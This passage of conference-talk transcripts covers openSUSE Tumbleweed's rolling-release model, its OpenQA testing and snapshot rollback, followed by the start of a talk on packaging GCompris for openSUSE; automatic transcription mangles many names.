email. I'll be happy to answer you there as well.
We often have the impression that while we keep working things don't seem to get solved. In this presentation we will discuss the development process, then will go over what the KDE community has been up to in terms of QA and will bring some ideas so that we can create, together, better solutions.
10.5446/54477 (DOI)
I'm now the after lunch slot, so I hope don't mind if people start trickling in, but I'm going to get things started. So I'm Richard Brown, Chairman of the OpenSuser project, and I'm here to talk to you today about tumbleweed, why I think it is the best thing since sliced bread, why I'm most excited about this and anything else we're doing in OpenSuser, why I think rolling releases are the future of Linux distributions, and some of the bits and pieces where I don't think we're doing everything that we could be doing to make it as smooth as it possibly could be. Because, you know, we're not perfect, we're just great. To talk about rolling releases, I really have to start at the beginning. We have to explain where Linux comes from, what is a distribution, and when we're talking about Linux distributions or traditional distributions, we are talking about regular releases. It's what most Linux distributions follow. It's a model where you collect all of your different upstream packages, you put them all together, you make a cohesive operating system as a distribution, and you're releasing it every X years or months. Depends on your users and your use case of how often that is. Community distributions generally favor slightly faster release schedules, so distributions like Fedora, Ubuntu, or the old OpenSuser would be every six to 12 months, and then, of course, you have things like enterprise distributions where the new major release of an enterprise distribution will be several years away. Once that release is out, once users can download that software and start using it, the general model of a traditional distribution is to not dramatically change the software within that. You know, being very, very conservative from that point, and only very reluctantly upgrading, very reluctantly patching those things you need to patch to keep the operating system working, but you don't want to introduce unexpected changes, you don't want to break anything, so, you know, very, very reluctantly doing that, generally freezing anything, which means when you look at sort of the big wide open source world and everything else going on and packages elsewhere, upstream projects elsewhere, the only choice to maintain a regular release is with heavy use of back porting, you know, so taking patches and fixes from the upstream project and putting them into your stable regular release one. And like I said, this is the traditional model, it's, you know, followed by Debian, Fedora, open-suzer-leap follows it as well, and yeah, Ubuntu. But developing these is tricky. You need something to start this. How do you develop a regular release? And most other Linux distributions rely on a development branch to do this. We used to, ours was called factory, but, you know, other distributions have things like Debian CID or Fedora Vorhide or Ubuntu have something that they kind of call dailies, but it never seems to work. But it's where your developers of a distribution should be using actively putting in their various upstream packages to constantly give you a rolling picture of, you know, where is your code base, what is your next regular release going to look like? Everything's ever frozen in there, it's always moving, and it's almost always broken. This is true of every single one out there, every single development branch, it's typically broken. And this is problematic because developers need their system to be as close as possible to the upstreams they're working on. You know, they need to be able to see where is, you know, both where is their particular part they're used to and everything else around them. They need to be able to see how it's all working. Dev branches accomplish that, but they're completely and utterly unstable and unusable. So you've got this sort of nice deadlock problem of, you know, how do you actually then get a good picture of what's really going on? What generally happens is developers stop using their dev branch, apart from when they really, really have to, to comply with some process somewhere. That means you have very narrow attention being paid to what's actually going on in all those upstreams that you're relying on to build your distribution. So it doesn't work for developers. They just move on and find some other way of hacking together their packages to get into the main regular releases. And that becomes a really big problem as a distribution project. So traditional open SUSE as a distribution project, we used to do this, we used to have factory and as your users and contributors of your dev branch decline, your entire project starts getting slower. There's no doubt about it. You get less indications of bugs before a regular release. You get less new features in your regular releases, you know, less innovation there because nobody knows what's going on. So even the most ambitious features they think of are relatively narrow things compared to what they could possibly be getting if they had a broader view of where the world is. You end up with over time, in particular, sort of increased technical debt stuff like that is lingering around in your dev branch for ages and no one ever fixes it, which then means when you do eventually have a regular release and you do eventually need to fix it, clearing that technical debt makes that release more and more expensive. It's more and more hard work. It's more and more work to get the community involved in doing it. And yeah, it just really, really starts holding the entire project back. It's not just a problem for the distributions trying to get this software into the hands of users, though. It's a problem for upstream developers also because every upstream project, especially in this day and age, wants to get their hands in the, you know, want to get this software in the hands of users as fast as humanly possible. Dev branches technically accomplish this, but they're useless really because no user's going to be using them. Regular releases don't accomplish it. Whatever schedule, whatever distribution picks, it's going to be too slow for that goal of getting it in the hands of users quickly. And then containerized apps, things like App Image, Flap Pack, Snappy, you know, promised to solve this, but it's not quite that easy. You know, they'll make it there one day, and if you want to hear more about my rant about that, you can come see my talk on Sunday at three o'clock in the other room. But yeah, the problem's not ideal there. And then when you start looking at users, and particularly enthusiastic Linux users, or users, you know, the kind of core part of the community that are interested in open source because it's open source, they also want to have that software as fast as possible. They don't want to wait, but when they get it, they want to make sure it works. So Dev branches don't work there either. And there's also the sort of second thing. Users want a consistent experience. They want it to feel like it's well put together, that, you know, collectively themed looks to the right, that feels right. The UX works properly. These are key requirements that users have. And this is another problem, actually, that a lot of these containerized apps are starting to bump into. You know, they're getting out there and running these things, but, you know, getting that feeling of this is a consistently built and a consistently engineered solution just doesn't work with either the regular release model, where it's always too slow, or the development branch model where everything's just moving too fast and breaking. And these are the people we've got to capture, because these are the people that are going to be our contributors in the future. They're the ones who are enthusiastic, they're the ones who are looking at these upstreams, who are keen on what we're doing. We need to find a way of encouraging them to use this software and, you know, get enamored by it so we can then start having them help maintain it and make things even quicker and faster. Rolling releases are the answer to these problems. But what is a rolling release? Well, in basic terms, a rolling release is a Linux distribution without a release schedule. No version numbers, no point releases, no milestone dates, frequently updating all of the packages in the operating system whenever they're ready. So you can just download it, start using it, and you're always going to get the latest ready, stable version of everything. There's other examples, of course, I'm talking about Tumbleweed, but there's sort of two other main distributions advocating this model and really pushing it, is Gentoo and Arch, where, you know, quite popular, especially in that enthusiastic user base area where you have people downloading it and getting the latest of everything in there. And when I talk to people about rolling releases, I always hear the same three complaints or the same three excuses of why they don't like a rolling release. There's a perception that they're unstable. There's a perception that they're unreliable, which is subtly different from being unstable, and they're a perception that they're hard to live with. In the case of unstable, in this case, I'm talking specifically about it's always changing. The way I used my system yesterday is now different from the way I have to use my system today. A fast moving code base is going to include changes. That is kind of part of the point. So some of the, you know, there is always going to be a little bit of a change in there. The question sometimes is how fast, and having different rolling releases at different paces is something that I think the world needs to start thinking about. But to really solve this problem, you need to be making sure that your rolling release is building everything, testing everything, and then integrating everything in a consistent cohesive fashion constantly. And then when that is then delivered to users, delivered in a way that those behavioral changes, that sudden new way that that new application is behaving, doesn't get in the way of the work they need to do that day. It's changed. They're going to have to learn it at some point, but you don't want it to block that work when they need to get their work done. That's somewhat different from the problem of unreliability, of the perception that rolling releases are going to break. It's a fair challenge. A lot of rolling distributions have this problem. It is thousands of moving parts from thousands of different upstream projects, and the distribution has to find some way of them getting it all working together. Just like we're solving the stability problem, you've got to build it consistently. You have to test it consistently, and you have to integrate it consistently. But speaking from experience, it isn't just a case of testing it before you ship it, but actually testing at the point of submission. Finding as early as possible when someone is contributing to a rolling code base, does this work? Will this break the entire build? Will this ruin everything? Testing it there really, really early, getting fast feedback, helps both with the kind of contribution engagement and use. And then, of course, you have a second shield of it. Testing is a whole. Because you can't just think of a Linux distribution like a collection of packages. This is the fatal flaw, which I think so many other distributions get wrong, and we get right, is we think of our distribution like a cohesive single thing that we ship. And we try and make sure that it all works together in one bit. And we're not falling into the trap of distributions like Arch, where, oh, we're shipping this wonderful library right on time, and they're forgetting that about the 20 other things it needs or should go with it aren't there, aren't integrated. And ultimately, the goal there is to make sure that you don't ship something that doesn't work. Talking about testing, most of the distributions, rolling and regular, and formerly us in the past, rely on passive testing with their community distributions. The idea of upstream has released something, we've packaged it, we've thrown it in some testing branch somewhere or something like that. And then we wait a bunch of days, and we just trust that someone in the community is going to look at it and play with it, and then it's good enough we ship. No one ever actually checked, did anyone actually tested it? They just trusted that no one filed enough bugs, it must be fine, so we shipped it. The model works to some degree. The bigger the community is, the more chance you have of finding those bugs quickly enough, and that testing window works out okay. But it's still Russian roulette. At some point, your users are going to get shot by something that slipped by that approach. Passive testing just does not work for distributions. You need to have active testing. You need to have proactively confirming, does this new package in this distribution break something just on its own? Does it work at all? Did the developer completely screw it up? Or does it work when you install it with a context of 20, 30, or 4,000 other packages? And does it change, or at least even if it's working technically speaking, does it change in a way that users don't expect? And you need to be able to answer that question in order to be able to integrate everything quickly and fast and deliver it to the users fast enough before an upstream release has even made that change. So you need to have a way of knowing at least as fast as possible after an upstream check something new in, or really before they check it in. Does this change something? Does this break something? So we can get working on fixing it and shielding our users from those problems. And then the last problem, the hardest to live with it, but when looking at the other rolling releases, Arch, I really respect Arch. They have this mantra of the Arch way, which gets summed up as do-it-yourself, it's a learning exercise. Not my way of doing things, but it works. The Arch Wiki is a wonderful bit of documentation. And then of course you have the Gentoo way, which is basically the same, it just takes longer because you're compiling. But that works for guys at the bleeding edge really, really working on this upstream stuff. It doesn't work even for most enthusiastic users. We have too much other stuff to do. We don't want to be hacking around with the inner workings of our distribution. We want something that we can just install, work with, and get the latest of everything because we want to have our cake and eat it too. And we need to have some way of stopping this. Something's changed and I have to spend three days hacking around my system to fix it and get it working the way it's meant to work. And in OpenSuser, we've asked this question, why do rolling releases need to be difficult? And obviously with Tumbleweed, we think the answer is they don't. But Tumbleweed didn't start out as the Tumbleweed we now know and love. It started originally by Greg Co-Hartman in, well, before 2014. I can't actually find the exact date where it started. And as you know, it's providing the latest updates. The kind of key focus point there is at the pace of contribution. Tumbleweed runs as fast as our community makes it run. Sometimes that means incredibly quickly. Sometimes that means we actively decide to do things at a slower pace because we think that's the best way of handling what that upstream project is doing. It's tested by OpenQA. And in terms of that kind of user-based focus, we're really targeting that developer, contributor, enthusiast part of things. Because that's really where rolling releases really, really shine. But old Tumbleweed wasn't like that at all. Tumbleweed originally started as a model of taking the base system of OpenSuser we were shipping at the time and putting rolling updates on top of that. So instead of having a separate release, it was really an add-on for an existing release. It had a very particular focus. Obviously, Greg Co-Hartman's a kernel hacker, so he started with the kernel and then the community started building up on that and things like KDE and GNOME and some applications got in. But that model of sitting the two meant that the only way of delivering software would overwrite the packages from the original base system, which meant every time we released a new base system, a new version of OpenSuser, your only choice was resetting to zero everything in Tumbleweed, which was a really dramatic change because any customizations that had been sitting in the Tumbleweed bit suddenly disappeared and vanished. Sometimes had their packages roll backwards or just with different config or yeah, it was always a painful mess. That wasn't the only lesson we really learned from that. I think the key lesson we learned was partially rolling distributions don't really work, not in a general sense. In a very narrow sense, in very specific, you know, small narrow use case with small narrow changes, I think you can make it work. But in terms of a general broad general purpose distribution, it just constantly fails because that rolling top constantly needs new requirements from that stable base and you can't change your stable base, it's stable. So you end up having to come around with nasty little hacks, you end up tinkering with the stable base, you end up linking stuff in weird and wonderful ways and it just falls apart every single time and even if it didn't, you still got that reset to zero every eight months with a new release, which is brutally disruptive for users. And I kind of sum up this lesson as my rolling release rule, which I think Tumbleweed really solved better than anything else. To be able to move a Linux distribution where you want to be able to move any one thing in there quickly, you know, you've got this massive code base and you want to move some weird library on the far end of something, you've got to have your tools, your processes, the technology in place where you can change everything. Just be prepared to throw out the entire distribution and start again just to get that one new library in there. And we've done that with Tumbleweed, not just on its own because we've done that with the tools we have. We couldn't do this without the build service. It's a key part of everything we're doing, we just had a presentation about it earlier, so I won't go on about it again. But the build service, the way it works, the fact that we can track all of these different dependencies in all these different locations, link them all together, rebuild them when they're needed, it makes sure that you have that consistent view of the distribution built quesively together all of the time. But building is fine. You need to make sure it works as well. And of course, we have OpenQA. Originally started 2009 for testing the basic installation part of OpenSuser. And it's become now an absolutely key part of the Tumbleweed release process. A single Tumbleweed update doesn't happen until it's been tested by OpenQA. It's also a key part of the leap process. It's now also a key part of the SLEZ development process. And it's even used by Red Hat for testing for Dora. I haven't got them using it for Red Hat, but working on that one. Hopefully one day. I'd like to steal their tests. But with OpenQA, you get these nice dashboards of all these different scenarios. So we're not just testing one basic, boring use case, but different ways of installing the distribution, different raid configurations, different desktop environments, different architectures, although that isn't shown on the screen here. In a deeper view, the tests break down to exactly the steps being done by the test. And the kind of key part here is it's not testing artificially and just poking around some APIs or calling very particular scripts to do very particular things. The tests are written in a way to actually test the software the same way a user is going to use it. So when you're talking about that kind of conceptual problem of making sure that your software, you know, you're aware when your software is changing in a way that a user might be impacted, that's exactly how OpenQA is testing this. So it can be a trivial change like a wallpaper or a login screen where we've changed the color. OpenQA at least makes us aware that that's happened so it flags it up so we can decide is this the right thing we want or not. If it is, we click next. It moves on. Everything's fine. And that is all then tied together into the factory development process where we have this kind of pipeline of code submissions going to tumbleweed, initially getting automatically reviewed in the build service, then getting tested in a process we call staging where we make sure in isolation does this one little thing work on its own? If it works fine on its own, that's the point when we then start involving humans and actually have someone looking at it and doing a proper review of the submission, does this actually work? At that point, it is then put into factory. So you have the sort of full, large, big code base, 10,000 plus packages all built together, all consistently integrated in one big pool, which we then test again in OpenQA in a much more intensive fashion. And that then gets done and pumped out at the end as tumbleweeding. That means if you want to change something in tumbleweed, you've basically got two very easy ways of doing that. One, just contribute to OpenQA. Writing a test to make sure that OpenQA is checking that one thing you really care about means that every single snapshot of every single tumbleweed will make sure that it behaves the way you want it to behave about. So you don't really even have to worry about packaging anything or coding anything. If you can just describe in an OpenQA test what you want to make sure stays that way, it will stay that way. Or at least it will stay that way until it breaks and then we'll figure out the best way of getting around the problem. But at least means we're aware that that use case has changed. Or if you're more packaging aware, the factory submission process obviously contribute to factory. That is how tumbleweed works. When I talk about all these toolings and processes, especially to upstream developers or new people to the project, I always get the same responses. That's cool. It's great. You're doing all this stuff fast. But I don't want to wait for that build or the test nonsense. I'm an upstream developer. I've just got my tarball. How can I run it really, really quickly? I don't want to wait for all this testing and stuff. Happens a lot with especially these people embracing stuff like Snappy. The process works at a ridiculous pace. I just realized I still haven't fixed this slide. I got the number wrong on it. Nome 322 is an example. The upstream release of Nome came out and within less than 48 hours, we had it fully integrated, fully tested and shipped in tumbleweed, every single package. And it worked. We had very few bugs, very few issues, users universally happy. When we did have a few issues, they got fixed the next day. In the case of KDE Plasma 5.9, not 4.9, we even actually shipped it on the upstream release day. The upstream release process for KDE, we actually get the tarballs a few days earlier. So we were able to do all of that testing and pre-work in place there and then we just hit the button when it was ready and done straight out. If that's still too slow for you, thanks to the build service, we've got these kind of separate incubator style projects where we can have derivatives of tumbleweed testing straight from the get of these upstream projects. So things like Nome Next or OpenSUSE or Krypton, where every single commit from KDE or from Nome immediately spins out new versions, tumbleweed style, tested tumbleweed style, and they're right away. That's not nice to brag about two simple examples. It's not just a case of the specific stacks where we're interested in. Is Dominic here? I guess not, because he knows all this stuff anyway. But Dominic Lemberg, our release manager for tumbleweed, every week he does a report to the community of what's been going on in tumbleweed this week. A year ago now, he made this comment of it's been a quiet week. There wasn't really that much and the report was shorter than usual. And that got me curious of what is a quiet week for Dominic. And that week was this, three snapshots. That's three different software releases. Basically the equivalent of a point release of a regular distribution. Collectively all those releases put together. We've included 146 new package updates. It included a new kernel. He changed a whole bunch of stuff on the DVDs that we ship. That's quiet. It's ludicrous. It's an insane amount of change for one week. In fact, a couple of weeks later, it was twice as much. Last week, in fact, two weeks ago, it was three times as much as that. The pace is still accelerating. The process still works. It scales out because we have more and more people using it. The tooling works so we can do huge amounts of changes in a relatively short time, keep pace with all of that and still make sure we're shipping something to the users that actually works. That works from our perspective and it works from the perspective of what upstreams are trying to deliver. Users might have different opinions. But this is where we have BTIFS and Snapper. Because we've got BTIFS as our default file system, because we ship Snapper as our tool for taking a snapshot every time you do an update, that means the whole problem of something changed in a way I don't like is immediately immunized. You can roll down tumbleweed every single day and if you then find out it's not working the way I wanted it to, you can always roll back to yesterday's snapshot and just work from there. Get your job done. Even if we break your machine, not that it happens, but you can even do that from grub. Even when the system is booting, it just works. That's great. But what about the development? What about open-suser factory? What about the dev branch approach? Once we started putting tumbleweed together in this way as an end of rolling release, that became the next question. What do we do about a factory? We don't need a development branch. We don't have a development branch in the purest sense anymore. There is no crazy rolling untested head for someone to mess around with because tumbleweed is keeping up so well, we can give our developers something that actually works all the time. They're always going to be close enough to be able to know what the hell is going on and everything they're doing. They don't need to have a factory anymore. It's there still in terms of the process. The process is the factory process, but the output of that is tumbleweed. That's what people use. I've been talking about rolling releases all of this time. What about an open-suser regular release? It's a simple truth that a couple of years ago, a huge amount of our community were very much focused on the kind of concepts I've been talking about so far today. Rolling releases, delivering quickly, factory or tumbleweed, and the enthusiasm for a traditional rolling release was fading away. The cool thing is, because of tumbleweed, we've been able to do really exciting things with the regular release that we were too scared or blind to think about in the first place. With Leap, we're able to have that nice, stable, Susan X Enterprise codebase at that nice, stable, regular release, the polar opposite of tumbleweed, the completely different use case for completely different people, and appealing also to completely different contributors. Then we can still, because we're using the build service, because we're using OpenQA, because we have all of these tools and techniques that we've been doing for years, take parts from tumbleweed that make sense, layer them on top, but still do so in a process that you're not having this nasty issue of rolling and stable breaking, and ship a nice, cohesively tested loop. In the past, OpenSuser used to always seem to be split. We had a community where some people wanted us to go faster, some wanted us to go slower. We can do both now. Tumbleweed is the fast road. Leap is a stable one. They both serve different users. They both work perfectly fine. They both actually help each other quite well, because it also helps that Slee is based on what we're doing in tumbleweed. All Slee engineers are developing on tumbleweed, and then it ends up filtering into both leap and Slee from that point of view. Just like that slide there. From a cross-section of the whole thing, you end up with a pitch like this, where obviously tumbleweed is over 8,000 packages. It's actually over 10,000 packages now. As a rolling base system, it's own unique code base, and then leap and Slee sharing a shared core and overlapping between the two. This is how things are developed. I really should have updated the slides, because I've just noticed the numbers wrong. Tumbleweed is rolling along constantly, constantly changing at its own pace. Then next year, like we already announced, there will be a new code base to replace the current one we are using for Slee 12, Slee 3, and leap 42. There will be core 15, not 13, and there will be Slee 15 and leap 15, all originating from what we're doing in tumbleweed, being frozen from there, polished up, tightened up, et cetera. It's great. It's wonderful. It's great from a rolling release perspective of getting things in the hands of users quickly and working with upstreams fast. It's a key part of how we're building the more stable enterprise-focused stuff we're doing at SUSE and Open SUSE. It all starts in tumbleweed. That's the main code base when this stuff all works. It's wonderful. It's not perfect. There's a few things in tumbleweed we really need to get fixed. To start with, this is the only sensible way of patching your tumbleweed machine. Zippered up, no allow vendor change. Not enough people know that, even though it's the first thing you read on the documentation these days. That's mainly a knock-on effect of how tumbleweed is built and how users are using tumbleweed with OBS. The traditional zipper up command is way too conservative. It only changes. It always assumes an upgrade. It doesn't work when upstreams change their version numbering. It doesn't work very comfortably if dependency change dramatically. It works fine for the regular release upgrade approach, but it isn't good enough for a rolling release. Zippered up, which you would think would be the right solution for doing the same thing but changing a whole operating system the whole time, ends up being a little bit too liberal. Quite often, especially in the presence of additional repositories, there's nothing stopping zippered up from grabbing packages from another OBS repo that you've set up on your machine and then using that to overwrite all of the stuff you have from tumbleweed. Zippered up, no allow vendor change is that happy medium in between of having the more loose zippered up approach of look at the latest version, get the latest version, put it on the system, but the no allow vendor change means it's going to try its best to do that for the packages from the repositories the user has chosen to install those repositories from. So if you're only using tumbleweed repositories, zippered up only pulls tumbleweed packages in. So if you're picking one thing from OBS, zippered up, no allow vendor change will keep pulling that one thing from OBS and not accidentally pull through the 20 other things that happen to live in the same repository. But it's way too obscure and way too long to type. I know there's millions of tumbleweed users out there who don't do this. And then they're machine break. And then they're on the forums. Yes. Yes. And there's a Zippered Conf option for that. I'm just getting to that part. So it is obscure and too long to type. I'd like us to think about changing either changing the default behavior of zippered up, because, for example, inside SLEE, we also use a variation of this for the ZIPP migration routine. There's a few extra variables there for SLEE. But it's clear that zippered up on its own is too liable to break stuff. I'd like us to think about changing that. Or having a variation, maybe specifically for tumbleweed, something like Zippered Twup. Or like Derek said, you can actually change a single line in your config file to make this the default behavior. Maybe we should be doing that in tumbleweed. Even when we solve that problem, and it's not that hard to solve, we just need to decide how to do it, we then need to also fix or remove the graphical update tools that tumbleweed is using. YAS and package kit. Because right now, you go to YAS, you try and do an update, it doesn't know what to do really with it. It doesn't have an equivalent of DUP, it doesn't have an equivalent of DUP and no allow render change. It tries to do a zipper up, which will work most of the time when things are quiet, but when there's big changes and big dependency changes, it falls over, it breaks, it doesn't work. And package kit, also, you know, a whole nother layer of problems there. So I'd really like to see us fixing those tools, getting them done, or if we can't get them fixed, remove them. So users don't get confused and start wondering, you know, why does my gnome update app keep on telling me to update and then not working properly? Yes. Yeah. The question is why don't we just make a script and do that? That's definitely one option we could do. You know, the problem there is people have quite a lot of update scripts now already, like for example, perfectly here, in the case of transactional updates. So transactional updates are a new technology which we've got in Tumbleweed. You can learn much more about it in this room at 5.15 today because Torsten's going to talk about it. But the short and simple version of it is transactional updates is taking the update model we currently have and the snapshot model we currently have where you're changing your system, taking a snapshot before, what's that, you're updating your system, you're taking a snapshot before, then updating your system and taking a snapshot after so you can roll back before and after and figure out what went wrong. That has quite a few negative side effects. One of them being you end up with a load of snapshots on your machine. And also it's not the cleanest and crispest way of keeping track of what's really going on in our system. With transactional updates in the simplest form, it's doing the update into a snapshot on BTRFS. So not touching the root file system, creating a snapshot, making all the changes in there and then when you reboot, that's the snapshot you boot into so all your updates are there. So it's completely atomic. It either all works or if it doesn't, you just roll back the whole snapshot and nothing got changed. It's already in tumbleweed and it's implemented as a script. So if we change the zip ad up, we have to change this or we can keep on using this. Yes. Yes. Quite often, in fact, the last time I rolled back was when I accidentally did RM minus RF in the wrong folder. But I haven't had to roll back because of a snapshot, because of a patching issue, but yeah, rolling back happens quite often with me, actually. But for transactional updates to really work, which I really think, actually, this is a technology in tumbleweed that's really exciting me. I'd actually like to see us think about doing this as the main update mechanism in tumbleweed one day to get there, because Torsten's talking about it in the context of cubic, a variation of tumbleweed, to get there for all of tumbleweed. We really need to get to the point where the packages are a little bit more compliant with our own packaging guidelines. Because the things that break this approach are things like packages putting stuff in SRV, packages messing around with user data, something that isn't going to be in that snapshot when it's patching in the snapshot, and then the whole thing falls apart and everything dies. We're not that far away from it, in fact. With the cubic stuff we're talking about later today, tumbleweed is already testing it alongside so we can see when they break. But yeah, long road to go. Snapshots are great. Funny we were talking about all of that. But it's only a temporary workaround. Once you've rolled back, you're back to exactly how you were yesterday, but tumbleweed still moved on. So you can't install anything, because you've only got the new packages in tumbleweed and not the old ones that you wanted to use yesterday. I'd like us to look at the possibility of retaining old snapshots in the tumbleweed repos. Not entirely sure how we'd do that, but maybe have fancy sim links, fancy snapshotted versions. Like I said, I'm not sure. It could be a logistical nightmare. But if we find a solution to this, we could really have this utopian vision of tumbleweed moving at full pace and users able to pick what pace actually suits them for tumbleweed. If they don't want to necessarily upgrade to the latest of everything, but want to maybe take a week or two or months or two longer to keep up with stuff, if we're keeping those old snapshots around in the build service and keeping those old snapshots around in download.openSuzo.org, users could still then have the version of the snapshot they want, get the packages that were built for that version of tumbleweed, and best of both worlds, everybody's happy or works. Obviously, despite the logistical issues and the fact I haven't got all the answers of how we could do this, it will also mean our mirror host would have to host a huge pile more packages. But tumbleweed is actually surprisingly small when it comes to our mirror infrastructure. We've got four terabytes now, I think, generally speaking. No, down to check. There's terabytes of stuff in our mirrors. Nine? Nine terabytes. Okay. Nine terabytes. Not four. Nine terabytes for most of our mirror infrastructure, that's all of OBS, all of our distributions, et cetera. Tumbleweed is about 60 gig of that. It's relatively small. It's a very fast-changing 60 gig, but it's a tiny part in comparison. So doubling or tripling it, especially if adding the additional size isn't going to change the churn rate too much because these are old snapshots, they're not going to be changing. Our mirror host shouldn't be that concerned with a little bit of the extra pain of having a few extra gig because they're holding nine terabytes already. And that's something else I'd like to see fixed in tumbleweed. We need more tests. I already gave you the sales pitch earlier, but we really, really need more tests. If you're finding something in tumbleweed you don't like, a bug, a behavior you dislike, whatever, write a test for it. The documentation is there, we accept poor requests, it's all in GitHub. We will merge that test, we will run that test on tumbleweed, and that problem will never happen again without us knowing about it first. That's fine for the generic stuff. There is sort of the second problem of how the heck do we test in video because Open QA is typically VM-based. So they don't have Nvidia cards in VMs. We do have some options for testing on bare metal. That's normally using stuff like IPMI, which means you're talking over serial and VNC, which isn't looking at an Nvidia card. So I'd love to have people thinking about how the heck can we test the Nvidia drivers, or any graphics drivers, but Nvidia is the one that breaks all the time on tumbleweeds. I'm just going to pick on them. It's theoretically possible. Like I said, we have to support in Open QA for handling different architectures, handling real hardware. It's all flexible on the back-end side of things. We just need a little bit of help with figuring out how to make that happen. Because if we can get stuff like third-party hardware drivers being tested in Open QA, tumbleweed will just have a whole other class of user who right now can't really touch it because they're unfortunate to have a laptop or desktop that has an Nvidia card in them. And then last but not least, the kind of non-technical thing I'd like. I'd like to hear how people are using tumbleweed. We've got to do a better job of marketing this. I can talk for hours about how I think the process is wonderful. I can talk about hours of what I'm using it for, what is the rest of the world using it for. Because with this, you've got a way of getting open source software in the hands of users quicker than anyone else, more cohesively engineered than anyone else. It's not just a server OS. It's not just a desktop OS. I know we've got people running it on Raspberry Pi. I know we've got people doing crazy robots and stuff like the other talk that's happening in the room right now. I want to hear about this so I can help get people writing case studies about it, writing blog posts, spreading the word. Because that's what's really exciting about tumbleweed. It's really a unique platform for doing cool stuff with. So please, there's my email address. Send me stuff. I promise I will help spread the word about it. So in review, who should be using tumbleweed? Developers. Any developer. Whatever upstream project you're working with, you want to be getting the latest and greatest stuff. Use tumbleweed. It just works. It's stable. If it doesn't work the way you want, just roll back using snapper. And if it's not quite perfect, you're a developer. You can help us fix it. If you're an upstream developer in particular, targeting tumbleweed is a great way of making sure your software is getting in the hands of users quicker. And our tools with the build service, with open QA, are there to be able to help you not just do it with us. You can do it with us first and then build it and test it on every other distribution too. Open QA isn't just an open suzer thing. OBS is building for every other distribution. We're even building app images and other containerized stuff in there now as well. Ultimately those tools are more work at the moment than traditional packaging when done right in OBS. So why avoid traditional packaging when you can do them right in OBS? And then as user, you want the latest and greatest of everything. Tumbleweed just works. And we would love you as a contributor. And then when you become a contributor, like I've already said twice now, the open QA process and the factory process, one is sort of reactive, one is proactive, you can make sure that tumbleweed is shaped exactly the way you want it to be. And if you do that and you join us and you become a direct contributor to tumbleweed, it's not just going to be helping you out. The tumbleweed user downloads are going higher and higher and higher. This is the last few years. So just to kind of explain the graph, because I notice it doesn't do that well. That blue line along the bottom is our old development branch. The orange line is old fashioned tumbleweed. The green line is the sum of both of them because they have branch and rolling. We kind of did the two things in parallel. So we had a few thousand users on it, but not a huge amount on those two different platforms. And then we merged them together, then we started doing this. And as you can see, since the end of November 2014, it's gone crazy. And I wanted to keep on going crazy. I want to have more users on that. I want to be able to show this graph next year that's twice as high. So please, thank you. Thank you and help me. Does anybody have any questions? Yeah. There's a microphone there if you want to go to actually understand. So it's a question about answering how to test NVIDIA. Have you tried PCI pass through with the virtualization solutions? In theory, I've messed around with it a little bit, but all the open QA hardware I have doesn't have an NVIDIA card in it. Haven't got the hardware for it. But yeah, in theory, that would work. Any more questions, comments, et cetera? Cool. Thank you very much.
Rolling Releases are the future of Linux distributions. They are already the better solution for power users & developers. Tumbleweed is the future of Rolling Releases. The methodologies, techniques, and capabilities of Tumbleweed are opening up new doors, creating possibilities, and disrupting existing technologies beyond its borders. This session will explain how and why openSUSE Tumbleweed is paving the way for that future, while already being "the reliable rolling release". The talk will dispel the fears, uncertainties and doubts that many have regarding rolling releases in general and Tumbleweed specifically, and share how you can get involved both using, and improving, this exciting fast moving foundation of the openSUSE Project. But not everything is perfect. This talk will also identify some rough edges in Tumbleweed and suggest collaborative solutions as to how the openSUSE Project could start addressing them, so we can continue the exceptional progress Tumbleweed has made into the future and beyond the year 2020.
10.5446/54478 (DOI)
Thank you for coming and assisting to my talk. We will discuss about the journey, about G-CompreQt, which is a new version of G-Compre, which is software for kids from almost 4 to 12 to play with and interact with a computer and they have like more 100 different kind of activities. And then we will discuss how in OpenSUSE we get upstream source and we try to deliver that directly in Leap4End users. So my plan will be no plan, don't have a plan when you want to try to start packaging. It should be a fun activity and the path will learn, you will learn a lot of things during the path of the travel, just a journey. So don't have big plans or something like this. Help me, I'm OpenSUSE users since almost 15 years now, which doesn't make me younger. I'm starting packaging since 7 years now. And globally you will find me supporting different projects like PostgreSQL, various OpenSUSE, of course, FSFE Fellowship Member and supporting kiddie sponsoring things I don't remember the name. I'm living in Switzerland, but I'm French. Sorry for the accent. So just a word from my slides. Another dark green like this one will be the jcon3 related one and the flashy green will be more some advice and with comments about how it works with packaging. For those who don't know how the code becomes a software that end users can use on OpenSUSE, we do that, mainly we pick sources, we will write a spec file which is mainly a receipt, then we will build this receipt on OBS or locally, we will see. Then we produce RPM, which is an installable part of and those RPM finally goes published on inside a repository. This is the first part. The second one to go until the distribution, we have to pixels publish RPM to submit them to factory, just factory process. It will get reviewed, then it will after some time get accepted inside factory, it will flow through OpenQ, but optionally only if you have tests for that and then it will get published for the middle way. So the first question is why I would start packaging? Because most of the time it's a fun story. One of the primary reason would be, I need this software and it's not yet packaged and because you will find a reason for that certainly. For jcon3 it started two years ago during a random meeting in Switzerland, which is one of the kiddies print they have. I met again one of my friends, Bruno Kudwin, so it's Bruno and Bruno working together, not at that time, we were drinking together. The jcon3 project has just finished, it's partaged to Qt at that time. I decided to propose them to try to publish the software to end users. So for packaging you have to find your challenge, choose a software, but I would recommend to know quite well upstream because you will have to interact with them. You will have to be your first users because you will compile the software, you should be able to know if the software works or not and then you will be able to perhaps patch sources, propose some modification and create bug reports upstream. So the upstream relation you will have is quite important. So we start collaborating one morning and I remember at that time they are proposing only torbols in jazip, and I asked Bruno to say, hey, could you try to publish it with xzformer? And he finally said, yes, why? I said, you will see that xzformer will be 15 to 25% less storage, which doesn't change that much jacom pre-life, but 25% of storage less on OBS storage and then on all mirror is quite a lot. So try to decide, yes. So that's a collaboration with upstream. You have sometimes to propose them some changes in the workflow just to get better things for you. Unfortunately for me, it was discovering that, unfortunately, there is some dependencies that are not yet on OBS. So we will have to fix that. A problem with starting packaging, we say, oh, super, I would like to do that for this software, but in fact, this software will depend on something and this something is not yet on OBS, so you will have to fix the package, package these dependencies first. So before starting, perhaps you should have a look at how much and it exists, those dependencies already on OBS because you will have to be ready to solve them, to build any kind of dependency you will have. And then you can find some crappy things that one package will lead in total final of 80 dependencies. Let's say, hello, Pg, admin 4. So this can drive you in a loop because the time you first package, the first dependencies, hopefully perhaps you will not a second level, but you can perhaps have a second level, then a third level, and then you are still not packaging the main software you want to use. In my case for JCom 3, hopefully there is only two, Box2D, which is a kind of animation for games, and QML Box2D, which is the cute things to interact with. And both of them are really low maintenance things. There really is one version every three years, so I was quite happy on that side. So I start to package those two dependencies first. When you are doing a packaging, and in fact you want to go to the XFREM and then publish the 